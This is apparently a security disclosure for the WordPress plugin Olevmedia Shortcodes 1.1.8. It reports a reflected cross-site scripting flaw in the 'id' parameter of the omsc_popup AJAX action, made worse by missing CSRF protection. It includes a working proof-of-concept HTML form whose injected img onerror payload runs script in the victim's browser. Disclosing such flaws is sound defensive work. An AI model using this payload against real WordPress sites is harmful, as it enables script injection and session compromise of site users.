Hello,

Plugin: Olevmedia Shortcodes 1.1.8 https://wordpress.org/plugins/olevmedia-shortcodes/

1. Reflected Cross-Site Scripting (XSS) 

Authenticated users (like subscribers) can inject html/js code (there is no CSRF protection!).

Method: POST

Url: http://localhost/wp-admin/admin-ajax.php?action=omsc_popup

Vulnerable parameters: id

Example PHP callstack:

omsc_popup_callback   [/olevmedia-shortcodes/functions/interface.php:43]

Verification:

--

<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=omsc_popup" />

<input type="text" name="id" value='</script>"><img src=x onerror=alert(1) />' />

<input type="submit" name="submit" />

</form>

--